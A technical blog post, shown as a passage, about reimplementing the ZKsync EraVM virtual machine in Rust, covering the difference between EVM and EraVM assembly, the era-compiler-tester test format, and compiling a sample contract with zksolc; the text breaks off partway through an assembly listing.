&lt;p&gt;We want to thank Anthony Rose and the Matter Labs team for all their help on this project, especially their &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;matter-labs&#x2F;vm2&quot;&gt;new fastVM implementation&lt;&#x2F;a&gt; which we used a lot as a reference.&lt;&#x2F;p&gt;
&lt;p&gt;You can follow our progress on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;era_vm&quot;&gt;our EraVM repository&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;development-process&quot;&gt;Development Process&lt;&#x2F;h2&gt;
&lt;p&gt;It’s important to state our methodology: even though the end goal is improving performance, our starting goal is different: we want a simple, working implementation.&lt;&#x2F;p&gt;
&lt;p&gt;We do not care about benchmarks &lt;strong&gt;at first&lt;&#x2F;strong&gt;. We know our initial implementation will be slow, but that’s not the point: the point is to get something simple working to understand all the moving parts. Only after that’s in place we shift our focus to benchmarks and performance.&lt;&#x2F;p&gt;
&lt;p&gt;When we started out, we knew very little about the EraVM. We knew it was different from the EVM, and we had indirectly used &lt;code&gt;zksolc&lt;&#x2F;code&gt; to compile and deploy contracts to the network, but we had not looked much into its internals.&lt;&#x2F;p&gt;
&lt;p&gt;The first thing we did to get into a working flow was to inspect the VM’s bytecode. We compiled simple contracts into EraVM assembly and started getting familiar with it. The goal when starting out on an unfamiliar VM is to set up a simple &lt;code&gt;fetch-&amp;gt;decode-&amp;gt;execute&lt;&#x2F;code&gt; loop that looks something like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn run(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    vm: VM,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    loop {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let opcode = vm.get_opcode(&amp;amp;opcode_table)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        match opcode {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                Opcode::Add =&amp;gt; todo!(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                Opcode::Sub =&amp;gt; todo!(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                Opcode::Jump =&amp;gt; todo!(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                Opcode::Mul =&amp;gt; todo!(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                Opcode::Div =&amp;gt; todo!(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                ... =&amp;gt; ...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        vm.pc += 1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;and then progressively implement all the opcodes. When we started looking at the assembly generated on contracts we realized the EraVM was a lot more complex than the EVM in terms of opcodes; fortunately, Matter Labs has a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;matter-labs&#x2F;zksync-era&#x2F;blob&#x2F;main&#x2F;docs&#x2F;specs&#x2F;zk_evm&#x2F;vm_specification&#x2F;zkSync_era_virtual_machine_primer.md&quot;&gt;very good primer on them&lt;&#x2F;a&gt; and a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;matter-labs.github.io&#x2F;eravm-spec&#x2F;spec.html&quot;&gt;full formal specification&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;After reading those and reading their own implementations, we stumbled into their own repo &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;matter-labs&#x2F;era-zkevm_opcode_defs&quot;&gt;defining all the VM opcodes&lt;&#x2F;a&gt;, and from there we could setup a proper loop like the above.&lt;&#x2F;p&gt;
&lt;p&gt;With it, we started writing our own simple EraVM assembly programs, testing all the different opcodes as we implemented them. Eventually, after getting the basic functionality in place, the simple assembly programs we wrote became insufficient to test complex interactions like contracts calling other contracts, gas management, etc.; we needed a proper test suite.&lt;&#x2F;p&gt;
&lt;p&gt;That proper test suite is the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;matter-labs&#x2F;era-compiler-tester&quot;&gt;era-compiler-tester&lt;&#x2F;a&gt;, a full test suite for the VM written by Matter Labs (technically this is also a test suite for the &lt;code&gt;zksolc&lt;&#x2F;code&gt; compiler itself, but we care about VM testing here). To get a fully working VM, we realized we needed to make these tests pass.&lt;&#x2F;p&gt;
&lt;p&gt;Before going into detail about them, let’s do a quick overview of the VM we set to reimplement.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;eravm-overview&quot;&gt;EraVM Overview&lt;&#x2F;h2&gt;
&lt;p&gt;ZKsync is a zk-Rollup meant to be EVM compatible. In practice, this can mean a number of different things. For ZKsync, it means that it’s compatible at the programming language level; this is done through &lt;code&gt;zksolc&lt;&#x2F;code&gt;, an LLVM based compiler written by Matter Labs that takes any Solidity, Yul or Vyper contract and compiles it down to the EraVM bytecode.&lt;&#x2F;p&gt;
&lt;p&gt;This might seem like full compatibility, but it’s not. The EraVM has a completely different architecture than the EVM, and some of these differences cannot be fully abstracted away.&lt;&#x2F;p&gt;
&lt;p&gt;As an example, the following Solidity contract:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;contract Test {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    function main(uint256 a, uint256 b) external pure returns(uint256 result) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        result = a + b;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;compiles to an EVM assembly that looks like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;PUSH1 0x80&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;PUSH1 0x40&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;MSTORE&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;CALLVALUE&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;DUP1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;ISZERO&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;PUSH1 0xE&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;JUMPI&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;and an EraVM assembly that looks like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;add	 128, r0, r3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;st.1	 64, r3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;and!	1, r2, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;jump.ne	@.BB0_1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;add	 r1, r0, r2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;shr.s	96, r2, r2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;and	 @CPI0_0[0], r2, r2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;sub.s!	4, r2, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;jump.lt	@.BB0_2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;ld	r1, r3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Clearly these are very different VMs. This requires getting used to these two different architectures when working at the VM level on ZKsync. A lot of operations that are opcodes on the &lt;code&gt;EVM&lt;&#x2F;code&gt; are not on the &lt;code&gt;EraVM&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;For instance, the EVM has a &lt;code&gt;returndatacopy&lt;&#x2F;code&gt; opcode, which copies the output data from a previous contract call into memory. On the &lt;code&gt;EraVM&lt;&#x2F;code&gt; there is no such thing; a call to &lt;code&gt;returndatacopy&lt;&#x2F;code&gt; on a Yul contract will compile to a block of code that looks like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;.BB0_19:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  ld.inc	r5, r7, r5&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  st.1.inc	r6, r7, r6&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  sub!	r6, r4, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  jump.ne	@.BB0_19&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We omitted some context, but this is essentially just a loop that will continuously load (&lt;code&gt;ld&lt;&#x2F;code&gt;) a word from the called contract’s memory and then store it (&lt;code&gt;st&lt;&#x2F;code&gt;) in the caller contract’s memory, then conditionally jump back (&lt;code&gt;jump.ne&lt;&#x2F;code&gt;) to the loop if the copying is not done yet (i.e. if the &lt;code&gt;sub!&lt;&#x2F;code&gt; instruction does not yield zero).&lt;&#x2F;p&gt;
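&lt;p&gt;In Rust terms, the loop above amounts to a word-by-word copy. The sketch below uses illustrative types, not the actual era_vm data structures:&lt;&#x2F;p&gt;

```rust
// A sketch of what the assembly loop does: each iteration loads one 32-byte
// word from the callee's return data (ld.inc) and stores it into the caller's
// heap (st.1.inc), until all words are copied (the jump.ne back-edge).
// `Word` and the Vec-based "memories" are illustrative, not the era_vm API.
type Word = [u8; 32];

fn copy_return_data(return_data: &[Word], caller_heap: &mut Vec<Word>) {
    for word in return_data {
        caller_heap.push(*word); // one ld + st pair per iteration
    }
}
```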
&lt;p&gt;This is just one example: most complex EVM opcodes work in a similar fashion on the EraVM.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;era-compiler-test-suite&quot;&gt;Era Compiler Test suite&lt;&#x2F;h2&gt;
&lt;p&gt;There are millions of tests on the &lt;code&gt;era-compiler-tester&lt;&#x2F;code&gt; repo, but they all follow the same structure. Each test is a Solidity, Yul or Vyper contract that is compiled with &lt;code&gt;zksolc&lt;&#x2F;code&gt; and run with certain inputs, in turn expecting certain outputs. As an example, the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;matter-labs&#x2F;era-compiler-tests&#x2F;blob&#x2F;fe7d0e86d06130ee266f82b04a549918da615521&#x2F;solidity&#x2F;simple&#x2F;default.sol&quot;&gt;default.sol&lt;&#x2F;a&gt; test looks like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;! { &amp;quot;cases&amp;quot;: [ {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!     &amp;quot;name&amp;quot;: &amp;quot;first&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!     &amp;quot;inputs&amp;quot;: [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!         {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!             &amp;quot;method&amp;quot;: &amp;quot;first&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!             &amp;quot;calldata&amp;quot;: [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!             ]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!         }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!     ],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!     &amp;quot;expected&amp;quot;: [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!         &amp;quot;42&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!     ]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;! }, {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!     &amp;quot;name&amp;quot;: &amp;quot;second&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!     &amp;quot;inputs&amp;quot;: [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!         {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!             &amp;quot;method&amp;quot;: &amp;quot;second&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!             &amp;quot;calldata&amp;quot;: [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!             ]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!         }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!     ],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!     &amp;quot;expected&amp;quot;: [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!         &amp;quot;99&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;!     ]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;! } ] }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; SPDX-License-Identifier: MIT&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pragma solidity &amp;gt;=0.4.16;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;contract Test {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    function first() public pure returns(uint64) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        uint64 result = 42;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        return result;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    function second() public pure returns(uint256) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        uint256 result = 99;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        return result;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The comment above the contract specifies what the test should run and what it expects. In this case, there are two tests, which run the methods &lt;code&gt;first&lt;&#x2F;code&gt; and &lt;code&gt;second&lt;&#x2F;code&gt; and expect &lt;code&gt;42&lt;&#x2F;code&gt; and &lt;code&gt;99&lt;&#x2F;code&gt; as results, respectively. Most tests have many comments specifying different runs, testing different functions with different inputs and outputs.&lt;&#x2F;p&gt;
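&lt;p&gt;To make the format concrete, here’s a rough Python sketch of how a harness could extract and parse that &lt;code&gt;&#x2F;&#x2F;!&lt;&#x2F;code&gt; header (purely illustrative; this is not the actual &lt;code&gt;era-compiler-tester&lt;&#x2F;code&gt; code):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;import json&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# Hypothetical sketch: collect the leading `&#x2F;&#x2F;!` lines of a test&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# contract and parse the embedded JSON test spec.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;def parse_test_spec(source):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    header = []&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for line in source.splitlines():&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if not line.startswith(&amp;#39;&#x2F;&#x2F;!&amp;#39;):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            break&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        header.append(line[3:])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return json.loads(&amp;#39;&amp;#39;.join(header))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Each parsed case would then drive one compile-and-run cycle, checking the outputs against the &lt;code&gt;expected&lt;&#x2F;code&gt; values.&lt;&#x2F;p&gt;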
&lt;h2 id=&quot;deep-dive-into-a-zksync-era-contract&quot;&gt;Deep dive into a ZKsync Era contract&lt;&#x2F;h2&gt;
&lt;p&gt;Let’s compile the &lt;code&gt;default.sol&lt;&#x2F;code&gt; program above and see what it’s doing under the hood. Running&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;zksolc default.sol --asm -o default --optimization 3 --overwrite&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;will place a &lt;code&gt;default.zasm&lt;&#x2F;code&gt; file under the &lt;code&gt;default&lt;&#x2F;code&gt; directory. This is the EraVM assembly for the contract:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	.text&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	.file	&amp;quot;default.sol:Test&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	.globl	__entry&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;__entry:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;.func_begin0:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	add	128, r0, r3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	st.1	64, r3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	and!	1, r2, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	jump.ne	@.BB0_1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	add	r1, r0, r2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	and!	@CPI0_1[0], r2, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	jump.eq	@.BB0_2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	ld	r1, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	shr.s	224, r1, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	sub.s!	@CPI0_2[0], r1, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	jump.eq	@.BB0_10&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	sub.s!	@CPI0_3[0], r1, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	jump.ne	@.BB0_2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	context.get_context_u128	r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	sub!	r1, r0, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	jump.ne	@.BB0_2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	add	42, r0, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	st.1	128, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	add	@CPI0_4[0], r0, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	ret.ok.to_label	r1, @DEFAULT_FAR_RETURN&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;.BB0_1:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	context.get_context_u128	r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
